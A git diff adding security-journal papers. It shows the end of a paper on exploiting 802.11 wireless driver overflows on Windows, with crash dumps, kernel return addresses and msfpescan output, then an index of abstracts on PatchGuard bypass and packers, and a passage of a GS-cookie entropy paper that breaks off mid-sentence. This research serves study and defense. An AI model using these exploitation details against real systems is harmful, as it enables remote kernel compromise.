+location of a jmp edi instruction is relatively simple, although more
+effective measures could be used to cross-reference addresses in an effort to
+find something more portable. Experimentation shows that 0x8066662c is a
+reliable location:
+
+kd> s nt L?10000000 ff e7
+8063abce ff e7 ff 21 47 70 21 83-98 03 00 00 eb 38 80 3d ...!Gp!......8.=
+806590ca ff e7 ff 5f eb 05 bb 22-00 00 c0 8b ce e8 74 ff ..._..."......t.
+806590d9 ff e7 ff 5e 8b c3 5b c9-c2 08 00 cc cc cc cc cc ...^..[.........
+8066662c ff e7 ff 8b d8 85 db 74-e0 33 d2 42 8b cb e8 d7 .......t.3.B....
+806bb44b ff e7 a3 6c ff a2 42 08-ff 3f 2a 1e f0 04 04 04 ...l..B..?*.....
+...
+
+With the exploit all but finished, the final question that remains unanswered
+is where the arbitrary code should be placed in the 802.11 packet. There are
+a few different ways that this could be tackled. The simplest solution to the
+problem would be to append the arbitrary code immediately after the
+SSID in the packet. However, this would make the packet malformed and might
+cause the driver to drop it. Alternatively, an arbitrary IE, such as a WPA
+IE, could be used as a container for the arbitrary code as suggested earlier
+in this section. For now, the authors decided to take the middle road. By
+default, a WPA IE will be used as the container for all payloads, regardless
+of whether or not the payloads fit within the IE. 
This has the effect of +allowing all payloads smaller than 256 bytes to be part of a well-formed +packet. Payloads that are larger than 255 bytes will cause the packet to be +malformed, but perhaps not enough to cause the driver to drop the packet. An +alternate solution to this issue can be found in the NetGear case study. + +At this point, the structure of the buffer and the packet as a whole have been +completely researched and are ready to be tested. The only thing left to do +is incorporate the arbitrary code that was described in 4.1. Much time was +spent debugging and improving the code that was used in order to produce a +reliable exploit. + +5.2) D-Link + +Soon after the Broadcom exploit was completed, the authors decided to write a +suite of fuzzing modules that could discover similar issues in other wireless +drivers. The first casualty of this process was the A5AGU.SYS driver provided +with the D-Link's DWL-G132 USB wireless adapter. The authors configured the +test machine (Windows XP SP2) so that a complete snapshot of kernel memory was +included in the system crash dumps. This ensures that when a crash occurs, +enough useful information is there to debug the problem. Next, the latest +driver for the target device (v1.0.1.41) was installed. Finally, the beacon +fuzzing module was started and the card was inserted into the USB port of the +test system. Five seconds later, a beautiful blue screen appeared while the +crash dump was written to disk. + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: 56149a1b, memory referenced +Arg2: 00000002, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: 56149a1b, address which referenced memory + +ErrCode = 00000000 +eax=00000000 ebx=82103ce0 ecx=00000002 edx=82864dd0 esi=f24105dc edi=8263b7a6 +eip=56149a1b esp=80550658 ebp=82015000 iopl=0 nv up ei ng nz ac pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 +56149a1b ?? ??? +Resetting default scope + +LAST_CONTROL_TRANSFER: from 56149a1b to 804e2158 + +FAILED_INSTRUCTION_ADDRESS: ++56149a1b +56149a1b ?? ??? 
+ +STACK_TEXT: +805505e4 56149a1b badb0d00 82864dd0 00000000 nt!KiTrap0E+0x233 +80550654 82015000 82103ce0 81f15e10 8263b79c 0x56149a1b +80550664 f2408d54 81f15e10 82103c00 82015000 0x82015000 +80550694 f24019cc 82015000 82103ce0 82015000 A5AGU+0x28d54 +805506b8 f2413540 824ff008 0000000b 82015000 A5AGU+0x219cc +805506d8 f2414fae 824ff008 0000000b 0000000c A5AGU+0x33540 +805506f4 f24146ae f241d328 8263b760 81f75000 A5AGU+0x34fae +80550704 f2417197 824ff008 00000001 8263b760 A5AGU+0x346ae +80550728 804e42cc 00000000 821f0008 00000000 A5AGU+0x37197 +80550758 f74acee5 821f0008 822650a8 829fb028 nt!IopfCompleteRequest+0xa2 +805507c0 f74adb57 8295a258 00000000 829fb7d8 USBPORT!USBPORT_CompleteTransfer+0x373 +805507f0 f74ae754 026e6f44 829fb0e0 829fb0e0 USBPORT!USBPORT_DoneTransfer+0x137 +80550828 f74aff6a 829fb028 804e3579 829fb230 USBPORT!USBPORT_FlushDoneTransferList+0x16c +80550854 f74bdfb0 829fb028 804e3579 829fb028 USBPORT!USBPORT_DpcWorker+0x224 +80550890 f74be128 829fb028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e +805508ac 804dc179 829fb64c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 +805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 +805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 + +Five seconds of fuzzing had produced a flaw that made it possible to gain +control of the instruction pointer. In order to execute arbitrary code, +however, a contextual reference to the malicious frame had to be located. In +this case, the edi register pointed into the source address field of the frame +in just the same way that it did in the Broadcom vulnerability. The bogus eip +value can be found just past the source address where one would expect it -- +inside one of the randomly generated information elements. + +kd> dd 0x8263b7a6 (edi) +8263b7a6 f3793ee8 3ee8a34e a34ef379 6eb215f0 +8263b7b6 fde19019 006431d8 9b001740 63594364 + +kd> s 0x8263b7a6 Lffff 0x1b 0x9a 0x14 0x56 +8263bd2b 1b 9a 14 56 2a 85 56 63-00 55 0c 0f 63 6e 17 51 ...V*.Vc.U..cn.Q + +The next step was to determine what information element was causing the crash. +After decoding the in-memory version of the frame, a series of modifications +and retransmissions were made until the specific information element leading +to the crash was found. Through this method it was determined that a long +Supported Rates information element triggers the stack overflow shown in the +crash above. + +Exploiting this flaw involved finding a return address in memory that pointed +to a jmp edi, call edi, or push edi; ret instruction sequence. This was +accomplished by running the msfpescan application included with the Metasploit +Framework against the ntoskrnl.exe of our target. The resulting addresses had +to be adjusted to account for the kernel's base address. The address that was +chosen for this version of ntoskrnl.exe was 0x804f16eb ( 0x800d7000 + +0x0041a6eb ). + +$ msfpescan ntoskrnl.exe -j edi +[ntoskrnl.exe] +0x0040365d push edi; retn 0x0001 +0x00405aab call edi +0x00409d56 push edi; ret +0x0041a6eb jmp edi + +Finally, the magic frame was reworked into an exploit module for the 3.0 +version of the Metasploit Framework. When the exploit is launched, a stack +overflow occurs, the return address is overwritten with the location of a jmp +edi, which in turn lands on the source address of the frame. The source +address was modified to be a valid x86 relative jump, which directs execution +into the body of the first information element. 
The maximum MTU of 802.11b is +over 2300 bytes, allowing for payloads of up to 1000 bytes without running +into reliability issues. Since this exploit is sent to the broadcast address, +all vulnerable clients within range of the attacker are exploited with a +single frame. + +5.3) NetGear + +For the next test, the authors chose NetGear's WG111v2 USB wireless adapter. +The machine used in the D-Link exploit was reused for this test (Windows XP +SP2). The latest version of the WG111v2.SYS driver (v5.1213.6.316) was +installed, the beacon fuzzer was started, and the adapter was connected to the +test system. After about ten seconds, the system crashed and another gorgeous +blue screen appeared. + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: dfa6e83c, memory referenced +Arg2: 00000002, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: dfa6e83c, address which referenced memory + +ErrCode = 00000000 +eax=80550000 ebx=825c700c ecx=00000005 edx=f30e0000 esi=82615000 edi=825c7012 +eip=dfa6e83c esp=80550684 ebp=b90ddf78 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 +dfa6e83c ?? ??? +Resetting default scope + +LAST_CONTROL_TRANSFER: from dfa6e83c to 804e2158 + +FAILED_INSTRUCTION_ADDRESS: ++ffffffffdfa6e83c +dfa6e83c ?? ??? + +STACK_TEXT: +80550610 dfa6e83c badb0d00 f30e0000 0b9e1a2b nt!KiTrap0E+0x233 +WARNING: Frame IP not in any known module. Following frames may be wrong. +80550680 79e1538d 14c4f76f 8c1cec8e ea20f5b9 0xdfa6e83c +80550684 14c4f76f 8c1cec8e ea20f5b9 63a92305 0x79e1538d +80550688 8c1cec8e ea20f5b9 63a92305 115cab0c 0x14c4f76f +8055068c ea20f5b9 63a92305 115cab0c c63e58cc 0x8c1cec8e +80550690 63a92305 115cab0c c63e58cc 6d90e221 0xea20f5b9 +80550694 115cab0c c63e58cc 6d90e221 78d94283 0x63a92305 +80550698 c63e58cc 6d90e221 78d94283 2b828309 0x115cab0c +8055069c 6d90e221 78d94283 2b828309 39d51a89 0xc63e58cc +805506a0 78d94283 2b828309 39d51a89 0f8524ea 0x6d90e221 +805506a4 2b828309 39d51a89 0f8524ea c8f0583a 0x78d94283 +805506a8 39d51a89 0f8524ea c8f0583a 7e98cd49 0x2b828309 +805506ac 0f8524ea c8f0583a 7e98cd49 214b52ab 0x39d51a89 +805506b0 c8f0583a 7e98cd49 214b52ab 139ef137 0xf8524ea +805506b4 7e98cd49 214b52ab 139ef137 a7693fa7 0xc8f0583a +805506b8 214b52ab 139ef137 a7693fa7 dfad502f 0x7e98cd49 +805506bc 139ef137 a7693fa7 dfad502f 81212de6 0x214b52ab +805506c0 a7693fa7 dfad502f 81212de6 c46a3b2e 0x139ef137 +805507c0 f74a1b57 825f1e40 00000000 829a87d8 0xa7693fa7 +805507f0 f74a2754 026e6f44 829a80e0 829a80e0 USBPORT!USBPORT_DoneTransfer+0x137 +80550828 f74a3f6a 829a8028 804e3579 829a8230 USBPORT!USBPORT_FlushDoneTransferList+0x16c +80550854 f74b1fb0 829a8028 804e3579 829a8028 USBPORT!USBPORT_DpcWorker+0x224 +80550890 f74b2128 829a8028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e +805508ac 804dc179 829a864c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 +805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 +805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 + +The crash indicates that not only did the fuzzer gain control of the driver's +execution address, but the entire stack frame was smashed as well. The esp +register points about a thousand bytes into the frame and the bogus eip value +inside another controlled area. 
+ +kd> dd 80550684 +80550684 79e1538d 14c4f76f 8c1cec8e ea20f5b9 +80550694 63a92305 115cab0c c63e58cc 6d90e221 + +kd> s 0x80550600 Lffff 0x3c 0xe8 0xa6 0xdf +80550608 3c e8 a6 df 10 06 55 80-78 df 0d b9 3c e8 a6 df <.....U.x...<... +80550614 3c e8 a6 df 00 0d db ba-00 00 0e f3 2b 1a 9e 0b <...........+... +80550678 3c e8 a6 df 08 00 00 00-46 02 01 00 8d 53 e1 79 <.......F....S.y +8055a524 3c e8 a6 df 02 00 00 00-00 00 00 00 3c e8 a6 df <...........<... +8055a530 3c e8 a6 df 00 40 00 e1-00 00 00 00 00 00 00 00 <....@.......... + +Analyzing this bug took a lot more time than one might expect. Suprisingly, +there is no single field or information element that triggers this flaw. Any +series of information elements with a length greater than 1100 bytes will +trigger the overflow if the SSID, Supported Rates, and Channel information +elements are at the beginning. The driver will discard any frames where the IE +chain is truncated or extends beyond the boundaries of the received frame. +This was an annoyance, since a payload may be of arbitrary length and content +and may not neatly fit into a 255 byte block of data (the maximum for a single +IE). The solution was to treat the blob of padding and shellcode like a +contiguous IE chain and pad the buffer based on the content and length of the +frame. The exploit code would generate the buffer, then walk through the +buffer as if it was a series of IEs, extending the very last IE via randomized +padding. This results in a chain of garbage information elements which pass +the driver's sanity checks and allows for clean exploitation. + +For this bug, the esp register was the only one pointing into controlled data. +This introduced another problem -- before the vulnerable function returned, it +modified stack variables and left parts of the frame corrupted. Although the +area pointed to by esp was stable, a corrupted block exists just beyond it. To +solve this, a tiny block of assembly code was added to the exploit that, when +executed, would jump to the real payload by calculating an offset from the eax +register. Finding a jmp esp instruction was as simple as running msfpescan on +ntoskrnl.exe and adjusting it for the kernel base address. The address that +was chosen for this version of ntoskrnl.exe was 0x804ed5cb (0x800d7000 + +0x004165cb). + +$ msfpescan ntoskrnl.exe -j esp +[ntoskrnl.exe] +0x004165cb jmp esp + +6) Conclusion + +Technology that can be used to help prevent the exploitation of user-mode +vulnerabilities is now becoming common place on modern desktop platforms. +This represents a marked improvement that should, in the long run, make the +exploitation of many user-mode vulnerabilities much more difficult or even +impossible. That being said, there is an apparent lack of equivalent +technology that can help to prevent the exploitation of kernel-mode +vulnerabilities. The public justification for the lack of equivalent +technology typically centers around the argument that kernel-mode +vulnerabilities are difficult to exploit and are too few in number to actually +warrant the integration of exploit prevention features. In actuality, sad +though it may seem, the justification really boils down to a business cost +issue. At present, kernel-mode vulnerabilities don't account for enough money +in lost revenue to support the time investment needed to implement and test +kernel-mode exploit prevention features. 
+ +In the interest of helping to balance the business cost equation, the authors +have described a process that can be used to identify and exploit 802.11 +wireless device driver vulnerabilities on Windows. This process includes +steps that can be taken to fuzz the different ways in which 802.11 device +drivers process 802.11 packets. In certain cases, flaws may be detected in a +particular device driver's processing of certain packets, such as Beacon +requests and Probe responses. When these flaws are detected, exploits can be +developed using the features that have been integrated into the 3.0 version of +the Metasploit Framework that help to streamline the process of transmitting +crafted 802.11 packets in an effort to gain code execution. + +Through the description of this process, it is hoped that the reader will see +that kernel-mode vulnerabilities can be just as easy to identify and exploit +as user-mode. Furthermore, it is hoped that this description will help to +eliminate the false impression that all kernel-mode vulnerabilities are much +more difficult to exploit (keeping in mind, of course, that there are indeed +kernel-mode vulnerabilities that are difficult to exploit in just the same way +that there are indeed user-mode vulnerabilities that are difficult to +exploit). While an emphasis has been put upon 802.11 wireless device drivers, +many different device drivers have the potential for exposing vulnerabilities. +Looking toward the future, there are many different opportunities for +research, both from an attack and defense point of view. + +From an attack point of view, there's no shortage of interesting research +topics. As it relates to 802.11 wireless device driver vulnerabilities, much +more advanced 802.11 protocol fuzzers can be developed that are capable of +reaching features exposed by all of the protocol client states rather than +focusing on the unauthenticated and unassociated state. For device drivers in +general, the development of fuzzers that attack the IOCTL interface exposed by +device objects would provide good insight into a wide range of locally exposed +vulnerabilities. Aside from techniques used to identify vulnerabilities, it's +expected that researching of techniques used to actually take advantage of +different types of kernel-mode vulnerabilities will continue to evolve and +become more reliable. From a defense point of view, there is a definite need +for research that is focused on making the exploitation of kernel-mode +vulnerabilities either impossible or less reliable. It will be interesting to +see what the future holds for kernel-mode vulnerabilities. + +Bibliography + +[1] bugcheck and skape. Windows Kernel-mode Payload Fundamentals. + http://www.uninformed.org/?v=3&a=4&t=sumry; + accessed Dec 2, 2006. + +[2] eEye. Remote Windows Kernel Exploitation - Step Into the Ring 0. + http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf; + accessed Dec 2, 2006. + +[3] Gast, Matthew S. 802.11 Wireless Networks - The Definitive Guide. + http://www.oreilly.com/catalog/802dot11/; + accessed Dec 2, 2006. + +[4] Lemos, Robert. Device drivers filled with flaws, threaten security. + http://www.securityfocus.com/news/11189; + accessed Dec 2, 2006. + +[5] SoBeIt. Windows Kernel Pool Overflow Exploitation. + http://xcon.xfocus.org/xcon2005/archives/2005/Xcon2005_SoBeIt.pdf; + accessed Dec 2, 2006. 
diff --git a/uninformed/6.txt b/uninformed/6.txt new file mode 100644 index 0000000..ec90511 --- /dev/null +++ b/uninformed/6.txt @@ -0,0 +1,17 @@ +Engineering in Reverse +Subverting PatchGuard Version 2 +Skywing +Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely. Potential solutions to these bypass techniques are also suggested. Additionally, this paper describes a mechanism by which PatchGuard version 2 can be subverted to run custom code in place of PatchGuard's system integrity checking code, all while leaving no traces of any kernel patching or custom kernel drivers loaded in the system after PatchGuard has been subverted. This is particularly interesting from the perspective of using PatchGuard's defenses to hide kernel mode code, a goal that is (in many respects) completely contrary to what PatchGuard is designed to do. +pdf | txt | code.tgz | html + +Locreate: An Anagram for Relocate +skape +This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper. +pdf | txt | code.tgz | html + +Exploitation Technology +Exploiting 802.11 Wireless Driver Vulnerabilities on Windows +Johnny Cache, H D Moore, skape +This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. 
Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised. +pdf | txt | code.tgz | html + diff --git a/uninformed/7.1.txt b/uninformed/7.1.txt new file mode 100644 index 0000000..b755c7c --- /dev/null +++ b/uninformed/7.1.txt @@ -0,0 +1,958 @@ +Reducing the Effective Entropy of GS Cookies +skape +mmiller@hick.org +3/2007 + +1) Foreword + +Abstract: This paper describes a technique that can be used to reduce the +effective entropy in a given GS cookie by roughly 15 bits. This reduction is +made possible because GS uses a number of weak entropy sources that can, with +varying degrees of accuracy, be calculated by an attacker. It is important to +note, however, that the ability to calculate the values of these sources for +an arbitrary cookie currently relies on an attacker having local access to the +machine, such as through the local console or through terminal services. This +effectively limits the use of this technique to stack-based local privilege +escalation vulnerabilities. In addition to the general entropy reduction +technique, this paper discusses the amount of effective entropy that exists in +services that automatically start during system boot. It is hypothesized that +these services may have more predictable states of entropy due to the relative +consistency of the boot process. While the techniques described in this paper +do not illustrate a complete break of GS, any inherent weakness can have +disastrous consequences given that GS is a static, compile-time security +solution. It is not possible to simply distribute a patch. Instead, +applications must be recompiled to take advantage of any security +improvements. In that vein, the paper proposes some solutions that could +be applied to address the problems that are outlined. + +Thanks: Aaron Portnoy for lending some hardware for sample collection. +Johnny Cache and Richard Johnson for discussions and suggestions. + +2) Introduction + +Stack-based buffer overflows are generally regarded as one of the most common +and easiest to exploit classes of software vulnerabilities. This prevalence +has lead to the implementation of many security solutions that attempt to +prevent the exploitation of these vulnerabilities. Some of these solutions +include StackGuard[1], ProPolice[2], and Microsoft's /GS compiler switch[5]. The +shared premise of these solutions involves the placement of a cookie, or +canary, between the buffers stored in a stack frame and the stack frame's +return address. The cookie that is placed on the stack is used as a marker to +detect if a buffer overflow has occurred prior to allowing a function to +return. This simple concept can be very effective at making the exploitation +of stack-based buffer overflows unreliable. + +The cookie-based approach to detecting stack-based buffer overflows involves +three general steps. First, a cookie that will be inserted into a function's +stack frame must be generated. The approaches taken to generate cookies vary +quite substantially, some having more implications than others. 
Once a cookie +has been generated, it must be pushed onto the stack in the context of a +function's prologue at execution time. This ensures that the cookie is placed +before the return address (and perhaps other values) on the stack. Finally, a +check must be added to a function's epilogue to make sure that the cookie that +was stored in the stack frame is the value that it was initialized to in the +function prologue. If an overflow of a stack-based buffer occurs, then it's +likely that it will have overwritten the cookie stored after the buffer. When +a mismatch is detected, steps can be taken to securely terminate the process +in a way that will prevent exploitation. + +The security of a cookie-based solution hinges on the fact that an attacker +doesn't know, or is unable to generate, the cookie that is stored in a stack +frame. Since it's impossible to guarantee in all situations that an attacker +won't be able to generate the bytes that compose the value of a cookie, it +really all boils down to the cookie being kept secret. If the cookie is not +kept secret, then the presence of a cookie will provide no protection when it +comes to exploiting a stack-based buffer overflow vulnerability. +Additionally, if an attacker can trigger an exploitable condition before the +cookie is checked, then it stands that the cookie will provide no protection. +One example of this might include overwriting a function pointer on the stack +that is called prior to returning from the function. + +While the StackGuard and ProPolice implementations are interesting and useful, +the author feels that no implementation is more critical than the one provided +by Microsoft. The reason for this is the simple fact that the vast majority +of all desktops, and a non-trivial number of servers, run applications +compiled with Microsoft's Visual C compiler. Any one weakness found in the +Microsoft's implementation could mean that a large number of applications are +no longer protected against stack-based buffer overflows. In fact, there has +been previous research that has pointed out flaws or limitations in +Microsoft's implementation. For example, David Litchfield pointed out that +even though stack cookies are present, it may still be possible to overwrite +exception registration records on the stack which may be called before the +function actually returns. This discovery was one of the reasons that +Microsoft later introduced SafeSEH (which had its own set of issues)[6]. +Similarly, Chris Ren et al from Cigital pointed out the potential implications +of a function pointer being used in the path of the error handler for the case +of a GS cookie mismatch occurring[9]. While not directly related to a particular +flaw or limitation in GS, eEye has described some of the problems that come +when secrets get leaked[3]. + +Even though these issues and limitations have existed, Microsoft's GS +implementation at the time of this writing is considered by most to be secure. +While this paper will not present a complete break of Microsoft's GS +implementation, it will describe certain quirks and scenarios that may make it +possible to reduce the amount of effective entropy that exists in the cookies +that are generated. As with cryptography, any reduction of the entropy that +exists in the GS cookie effectively makes it so there are fewer unknown +portions of the cookie. This makes the cookie easier to guess by reducing the +total number of possibilities. 
Beyond this, it is expected that additional
+research may find ways to further reduce the amount of entropy beyond that
+described in this document. One critical point that must be made is that
+since the current GS implementation is statically linked when binaries are
+compiled, any flaw that is found in the implementation will require a
+recompilation of all binaries affected by it. To help limit the scope, only
+the 32-bit version of GS will be analyzed, though it is thought that similar
+attacks may exist on the 64-bit version as well.
+
+The structure of this paper is as follows. In chapter 3, a brief description
+of Microsoft's current GS implementation will be given. Chapter 4 will
+describe some techniques that may be used to attack this implementation.
+Chapter 5 will provide experimental results from using the attacks that are
+described in chapter 4. Chapter 6 will discuss steps that could be taken to
+improve the current GS implementation. Finally, chapter 7 will discuss some
+areas where future work could be applied to further improve on the techniques
+described in this document.
+
+3) Implementation
+
+As was mentioned in the introduction, security solutions that are designed to
+protect against stack-based buffer overflows through the use of cookies tend
+to involve three distinct steps: cookie generation, prologue modifications,
+and epilogue modifications. Microsoft's GS implementation is no different.
+This chapter will describe each of these three steps independently of one
+another to paint a picture for how GS operates.
+
+3.1) Cookie Generation
+
+Microsoft chose to have the GS implementation generate an image file-specific
+cookie. This means that each image file (executable or DLL) will have its
+own unique cookie. When used in conjunction with a stack frame, a function
+will insert its image file-specific cookie into the stack frame. This will be
+covered in more detail in the next section. The actual approach taken to
+generate an image file's cookie lives in a compiler-inserted routine called
+__security_init_cookie. This routine is placed prior to the call to the image
+file's actual entry point routine and therefore is one of the first things
+executed. By placing it at this point, all of the image file's code will be
+protected by the GS cookie.
+
+The guts of the __security_init_cookie routine are actually the most critical part
+to understand. At a high level, this routine will take an XOR'd combination
+of the current system time, process identifier, thread identifier, tick count,
+and performance counter. The end result of XOR'ing these values together is
+what ends up being the image file's security cookie. To understand how this
+actually works in more detail, consider the following disassembly from an
+application compiled with version 14.00.50727.42 of Microsoft's compiler.
+Going straight to the disassembly is the best way to concretely understand the
+implementation, especially if one is in search of weaknesses.
+
+Like all functions, the __security_init_cookie function starts with a prologue.
+It allocates storage for some local variables and initializes some of them to
+zero. It also initializes some registers, specifically edi and ebx which will
+be used later on. 
+ +.text:00403D58 push ebp +.text:00403D59 mov ebp, esp +.text:00403D5B sub esp, 10h +.text:00403D5E mov eax, __security_cookie +.text:00403D63 and [ebp+SystemTimeAsFileTime.dwLowDateTime], 0 +.text:00403D67 and [ebp+SystemTimeAsFileTime.dwHighDateTime], 0 +.text:00403D6B push ebx +.text:00403D6C push edi +.text:00403D6D mov edi, 0BB40E64Eh +.text:00403D72 cmp eax, edi +.text:00403D74 mov ebx, 0FFFF0000h + +As part of the end of the code above, a comparison between the current +security cookie and a constant 0xbb40e64e is made. Before __security_init_cookie +is called, the global securitycookie is initialized to 0xbb40e64e. The +constant comparison is used to see if the GS cookie has already been +initialized. If the current cookie is equal to the constant, or the high +order two bytes of the current cookie are zero, then a new cookie is +generated. Otherwise, the complement of the current cookie is calculated and +cookie generation is skipped. + +.text:00403D79 jz short loc_403D88 +.text:00403D7B test eax, ebx +.text:00403D7D jz short loc_403D88 +.text:00403D7F not eax +.text:00403D81 mov __security_cookie_complement, eax +.text:00403D86 jmp short loc_403DE8 + +To generate a new cookie, the function starts by querying the current system +time using GetSystemTimeAsFileTime. The system time as represented by Windows +is a 64-bit integer that measures the system time down to a granularity of 100 +nanoseconds. The high order 32-bit integer and the low order 32-bit integer +are XOR'd together to produce the first component of the cookie. Following +that, the current process identifier is queried using GetCurrentProcessId and +then XOR'd as the second component of the cookie. The current thread +identifier is then queried using GetCurrentThreadId and then XOR'd as the +third component of the cookie. The current tick count is queried using +GetTickCount and then XOR'd as the fourth component of the cookie. Finally, +the current performance counter value is queried using +QueryPerformanceCounter. Like system time, this value is also a 64-bit +integer, and its high order 32-bit integer and low order 32-bit integer are +XOR'd as the fifth component of the cookie. Once these XOR operations have +completed, a comparison is made between the newly generated cookie value and +the constant 0xbb40e64e. If the new cookie is not equal to the constant +value, then a second check is made to make sure that the high order two bytes +of the cookie are non-zero. If they are zero, then a 10 bit left shift of the +cookie is performed in order to seed the high order bytes. + +.text:00403D89 lea eax, [ebp+SystemTimeAsFileTime] +.text:00403D8C push eax +.text:00403D8D call ds:__imp__GetSystemTimeAsFileTime@4 +.text:00403D93 mov esi, [ebp+SystemTimeAsFileTime.dwHighDateTime] +.text:00403D96 xor esi, [ebp+SystemTimeAsFileTime.dwLowDateTime] +.text:00403D99 call ds:__imp__GetCurrentProcessId@0 +.text:00403D9F xor esi, eax +.text:00403DA1 call ds:__imp__GetCurrentThreadId@0 +.text:00403DA7 xor esi, eax +.text:00403DA9 call ds:__imp__GetTickCount@0 +.text:00403DAF xor esi, eax +.text:00403DB1 lea eax, [ebp+PerformanceCount] +.text:00403DB4 push eax +.text:00403DB5 call ds:__imp__QueryPerformanceCounter@4 +.text:00403DBB mov eax, dword ptr [ebp+PerformanceCount+4] +.text:00403DBE xor eax, dword ptr [ebp+PerformanceCount] +.text:00403DC1 xor esi, eax +.text:00403DC3 cmp esi, edi +.text:00403DC5 jnz short loc_403DCE +... 
+
+.text:00403DCE loc_403DCE:
+.text:00403DCE                 test    esi, ebx
+.text:00403DD0                 jnz     short loc_403DD9
+.text:00403DD2                 mov     eax, esi
+.text:00403DD4                 shl     eax, 10h
+.text:00403DD7                 or      esi, eax
+
+Finally, when a valid cookie is generated, it's stored in the image file's
+__security_cookie. The bit-wise complement of the cookie is also stored in
+__security_cookie_complement. The reason for the existence of the complement
+will be described later.
+
+.text:00403DD9                 mov     __security_cookie, esi
+.text:00403DDF                 not     esi
+.text:00403DE1                 mov     __security_cookie_complement, esi
+.text:00403DE7                 pop     esi
+.text:00403DE8                 pop     edi
+.text:00403DE9                 pop     ebx
+.text:00403DEA                 leave
+.text:00403DEB                 retn
+
+In simpler terms, the meat of the cookie generation can basically be
+summarized through the following pseudo code:
+
+Cookie  = SystemTimeHigh
+Cookie ^= SystemTimeLow
+Cookie ^= ProcessId
+Cookie ^= ThreadId
+Cookie ^= TickCount
+Cookie ^= PerformanceCounterHigh
+Cookie ^= PerformanceCounterLow
+
+3.2) Prologue Modifications
+
+In order to make use of the generated cookie, functions must be modified to
+insert it into the stack frame at the time that they are called. This does
+add some overhead to the call time associated with a function, but its overall
+effect is linear with respect to a single invocation. The actual
+modifications that are made to a function's prologue typically involve just
+three instructions. The cookie that was generated for the image file is XOR'd
+with the current value of the frame pointer. This value is then placed in the
+current stack frame at a precisely chosen location by the compiler.
+
+.text:0040214B                 mov     eax, __security_cookie
+.text:00402150                 xor     eax, ebp
+.text:00402152                 mov     [ebp+2A8h+var_4], eax
+
+It should be noted that Microsoft has taken great care to refine the way a
+stack frame is laid out in the presence of GS. Locally defined pointers,
+including function pointers, are placed before statically sized buffers in the
+stack frame. Additionally, dangerous input parameters passed to the function,
+such as pointers or structures that contain pointers, will have local copies
+made that are positioned before statically sized local buffers. The local
+copies of these parameters are used instead of those originally passed to the
+function. These two changes go a long way toward helping to prevent other
+scenarios in which stack-based buffer overflows might be exploited.
+
+3.3) Epilogue Modifications
+
+When a function returns, it must check to make sure that the cookie that was
+stored on the stack has not been tampered with. To accomplish this, the
+compiler inserts the following instructions into a function's epilogue:
+
+.text:00402223                 mov     ecx, [ebp+2A8h+var_4]
+.text:00402229                 xor     ecx, ebp
+.text:0040222B                 pop     esi
+.text:0040222C                 call    __security_check_cookie
+
+The value of the cookie that was stored on the stack is moved into ecx and
+then XOR'd with the current frame pointer to get it back to the expected
+value. Following that, a call is made to __security_check_cookie where the
+stack frame's cookie value is passed in the ecx register. The
+__security_check_cookie routine is very short and sweet. The passed-in cookie
+value is compared with the image file's global cookie. If they don't match,
+__report_gsfailure is called and the process eventually terminates. This is
+what one would expect in the case of a buffer overflow scenario. However, if
+they do match, the routine simply returns, allowing the calling function to
+proceed with execution and cleanup. 
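+
+Expressed as C, the check reduces to something along the lines of the sketch
+below. The sketch is a simplification: the real routine receives the de-XOR'd
+cookie in the ecx register rather than as an ordinary argument, and the extern
+declarations are abbreviations of the CRT symbols rather than their exact
+prototypes. The actual routine is reproduced in the disassembly that follows.
+
+// Simplified sketch of the epilogue check performed by
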